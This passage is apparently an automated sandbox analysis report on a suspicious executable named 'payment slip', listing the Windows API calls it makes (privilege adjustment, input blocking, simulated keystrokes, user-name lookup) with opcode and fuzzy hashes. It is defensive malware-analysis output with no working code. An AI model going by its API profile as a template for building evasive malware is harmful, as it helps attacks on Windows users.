                                        • Opcode ID: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                        • Instruction ID: ada5487d4ef2401ac32852814e356de12f197dee6c7c0395b476acd7886b6c7d
                                        • Instruction Fuzzy Hash: 6F312B75A00518DFEB00DF95D894FADBBB4FF49314F088099E809AB362DB35E855CB90
                                        APIs
                                          • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                          • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                        • GetLastError.KERNEL32 ref: 0009174A
                                        Similarity
                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                        • String ID:
                                        • API String ID: 577356006-0
                                        • Opcode ID: eff74e15e7e048d1ceabb0054a89ac493ef4e727c0be85529d47ed66f64947f9
                                        • Instruction ID: 6be384abe43934d8b310967a58f647a50f1ee88259a9995bf6e12eca073dbf8b
                                        • Instruction Fuzzy Hash: CB1191B2904306AFE7189F54EC86DAAB7F9EF44714B24852EE05657251EB70BC428A24
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D608
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0009D645
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D650
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 6d3997fd86226308f91f271c88dca766b152fa9591a2889ada6decd9ed3bf666
                                        • Instruction ID: a8a006425d87557a7d75a4a2ff5e50afaa248dd72c7bdbbe8c041dc9e8c1d5c2
                                        • Instruction Fuzzy Hash: 22116175E45228BFEB208F95EC45FAFBFBCEB45B50F108116F908E7290D6704A059BA1
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0009168C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000916A1
                                        • FreeSid.ADVAPI32(?), ref: 000916B1
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: c92b5361dc3becb45ff0683b544fd7299ce43a702653277b92df8ddc0f218384
                                        • Instruction ID: eec54f05c84f5e6298d82c16d8878a7a6cfe457ff7e34ea699d073a1d3d1048c
                                        • Instruction Fuzzy Hash: 3BF0F471950309FBEF00DFE4DC89EAEBBBCFB08604F504565E901E2181E774AA449A54
                                        APIs
                                        • GetCurrentProcess.KERNEL32(000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D09
                                        • TerminateProcess.KERNEL32(00000000,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000,?,000628E9), ref: 00054D10
                                        • ExitProcess.KERNEL32 ref: 00054D22
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 1fc941d92123b3a37075d50c230464da014c0a8c26b3d41ecea88954f1ad127e
                                        • Instruction ID: 0606665a2986f318c4549e5d373c6b08165cf7829483aafcaea99607fbb75cef
                                        • Instruction Fuzzy Hash: 1EE0B631400148ABEF11AF54EE09E993B79FB41786B148018FC098B123CB3ADE86CAA0
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                        • Instruction ID: bfd01b7f2bca449616e409a8ec0adf1c508854170d2354882763d68330e99317
                                        • Opcode Fuzzy Hash: add8697db7c06a2cd6c33babc3753613f6c6e5acc55263e7c9fa8dff354b862b
                                        • Instruction Fuzzy Hash: D5413B725002196FEB20DFB9DC49DBB77BAEB84314F504269F945D7281E6709E41CB50
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 0008D28C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                        • Instruction ID: a7e09d8eb9178bf21b2e3c263573a7b02a93900d1eb6aa56d3618a50eada6a3e
                                        • Opcode Fuzzy Hash: 3503a0894617159eb8ca37489b06c4552a4e24f3599cdb1f208f499b5c975ae9
                                        • Instruction Fuzzy Hash: CDD0C9B480112DEADBA0DB90EC88DDDB37CBB14305F100252F506A2040D73495488F10
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction ID: acfec07cbdde247042bf01b9522f1f61f615afaf793eadb54fb7eb13df56bbd6
                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction Fuzzy Hash: 4C021C71E002199FEF14CFA9C884AAEBBF1EF48315F258169D819E7381D731AE45CB94
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000A6918
                                        • FindClose.KERNEL32(00000000), ref: 000A6961
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                        • Instruction ID: f682372b6bbaed95cf3608389238dfcee0e15adb55e0069f415de9f463bac683
                                        • Opcode Fuzzy Hash: 03e90ed50d0e252c912536acfeaf1a9cc2626f75e835c05b5667e60d0ad48d23
                                        • Instruction Fuzzy Hash: 3F11D3356042009FD710CF69C484E16BBE4FF85328F08C6A9E4698F2A2CB31EC05CB90
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37E4
                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,000B4891,?,?,00000035,?), ref: 000A37F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                        • Instruction ID: 30d707e595800fcb870e2b4b9eaef7015f65e8c3b8e67aa82bf182a9068ad687
                                        • Opcode Fuzzy Hash: 5f1b0ef6f078c28cfe85da05bb118e42ca2091d9795c523c453787f1438556ca
                                        • Instruction Fuzzy Hash: 00F0E5B16043282AF72057A69C4DFEF3AAEEFC5761F000175F509D22D1D9A09904C6B0
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0009B25D
                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 0009B270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                        • Instruction ID: 58c7c151142fcbade6054568f2302e3c61d6002fb06dc13193f18b39192c8918
                                        • Opcode Fuzzy Hash: 14a39df788aaf45cf0f93f773e7b55e605ef5b787d205c59d1ad57de1d67320d
                                        • Instruction Fuzzy Hash: 01F01D7180424DABEF159FA0D805BAE7BB4FF04315F00801AF955A5191C77996119F94
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,000911FC), ref: 000910D4
                                        • CloseHandle.KERNEL32(?,?,000911FC), ref: 000910E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: a954116f20bf461398f2e94ced398c6c380f695e87df05202b787e510d37043c
                                        • Instruction ID: 9726d31d16692d446cf91d00e164c386a7d9e8379784e045e86d961bd92d13ca
                                        • Opcode Fuzzy Hash: a954116f20bf461398f2e94ced398c6c380f695e87df05202b787e510d37043c
                                        • Instruction Fuzzy Hash: 23E0BF72014651AEF7252B51FC05EB777E9EB04311B24882DF5A6804B1DB626C90EB54
                                        Strings
                                        • Variable is not of type 'Object'., xrefs: 00080C40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable is not of type 'Object'.
                                        • API String ID: 0-1840281001
                                        • Opcode ID: 96b1462051a15fa28c1578b3c211f39818db0acbd30ba3a3e5359ef85bb1c509
                                        • Instruction ID: 276aa894707942c63ed27cb6aeb695aa7bd2cffabf56c056d04cf534c4843174
                                        • Opcode Fuzzy Hash: 96b1462051a15fa28c1578b3c211f39818db0acbd30ba3a3e5359ef85bb1c509
                                        • Instruction Fuzzy Hash: 8F32AC74900218DFEF65EF94C881EEDB7B9BF05304F148069E846BB292DB75AE49CB50
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00066766,?,?,00000008,?,?,0006FEFE,00000000), ref: 00066998
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                        • Instruction ID: 82c289e151f4f31c7b780caea2108a696b332f9d161759d20325bc0295797290
                                        • Opcode Fuzzy Hash: 2f660e55321369516054b507545ce22fa4fde5d0425191c53163b9b5a6e485e1
                                        • Instruction Fuzzy Hash: 14B14C31610608DFD755CF28C48AB697BE1FF45364F258658E89ACF2A2C736E991CB40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                        • Instruction ID: e1f9390d9f25e16bc1eb94143f27fdd5d8c46aff02e9e554b92427adaf45ad9f
                                        • Opcode Fuzzy Hash: 1f874841e5436acde9b71a2e6863366e8b7b1d47a796d6ad9048817d4d19c87c
                                        • Instruction Fuzzy Hash: 6C1250B19002299FDB64DF58C8806EEB7F5FF48710F5481AAE849EB251DB349E81CF94
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 000AEABD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                        • Instruction ID: 0ede50adcfaecb5d9411b9ddadb8ff3bf4716b660c8580446f5e0bf718de675e
                                        • Opcode Fuzzy Hash: 9624cc6a3bf2c10bb3f3b75c9d9f8a3b9e779d286259128dd6df33dfb30ecf40
                                        • Instruction Fuzzy Hash: 70E01A362002049FD710EF99D804E9AB7EDAFA9760F00842AFD49DB351DA70AC408B91
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000503EE), ref: 000509DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                        • Instruction ID: 30439418e2658f28c5aae0a513585a5a54712a62a67685fcbd5bb606e5e02e31
                                        • Opcode Fuzzy Hash: fb97effb855a83746ac8e1a1aa04d6f4de5dc421fbf1dc03a812e7e976a8aa2f
                                        • Instruction Fuzzy Hash:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction ID: 9760d05a73ce98cd3e9533e2b73cc5d80217305d5b8fd789aca9d296cb7a17de
                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction Fuzzy Hash: 7751477168C6055ADFB88568A85D7FF63C9DB52302F180509DC8ED7282CE16EE0DF362
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                        • Instruction ID: 2d8f93fdac0a7e798ccf80a6027b4fe8ccfa2aa728c4295cdb1e0be65b5a4207
                                        • Opcode Fuzzy Hash: 9099be6a198f3f4df7aff0aa3588b65dce2bdbcc8c3a83f2c4a4f3a3d1e5810d
                                        • Instruction Fuzzy Hash: 9E32F222D2AF414DE7239634DC22335A78AAFB73D9F15D737EC1AB59A5EB29C4834100
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                        • Instruction ID: ff493c746c60c608e6bd2add35e8e3227f13083571656b4574ca26703f00cfd7
                                        • Opcode Fuzzy Hash: 2b0384053f77cc998cf2ccd2f8651f50bc871a96fb2fd63e9d3781aaaa08101d
                                        • Instruction Fuzzy Hash: 0E321171A002558BFFB8EA28C4D4EBC7BF1FB45314F28817AD5CA8B691D2309D81DB61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d54c2edf380088f96e509db7744debb9079f89df44bc961c4208731222dae65c
                                        • Instruction ID: 103e852e209d199b3090ec3182ee546c74fa52a62be9e9cefdb5be0dbb0de696
                                        • Opcode Fuzzy Hash: d54c2edf380088f96e509db7744debb9079f89df44bc961c4208731222dae65c
                                        • Instruction Fuzzy Hash: E922B2B0E0460ADFDF25CF64C881AEEB3F5FF44301F108529E81AA7291EB79A955CB54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a280e57caaba0bccee4e9a78a2a3e8acccf8409a373a5168c43425121b38f611
                                        • Instruction ID: a39dfa5cd2237fd5ecc5c87f5bc7822f99e5edf4a54e8ecfa9a81c4a2e9cd014
                                        • Opcode Fuzzy Hash: a280e57caaba0bccee4e9a78a2a3e8acccf8409a373a5168c43425121b38f611
                                        • Instruction Fuzzy Hash: 5202D8B0E00106EFDB15DF54D881AAEB7B5FF48300F11C169E81A9B291EB75EE11CB95
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: e086eb4db394a85e079ec0a0296ec660d565ddfeca7436132be83485c0612334
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: 7B9175321080A34ADB69463A85356BFFFF15B923A371A079DDCF2CA1C1EE20895CD620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: 3c22fd8e610a89ff0294d01a078be1ec849a3850666fc59a280ee7f0b25379bd
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: 949159722090A349EB6E427A85741BFFFE15B923A371A079DD8F2CA1C1FE14C55CD620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
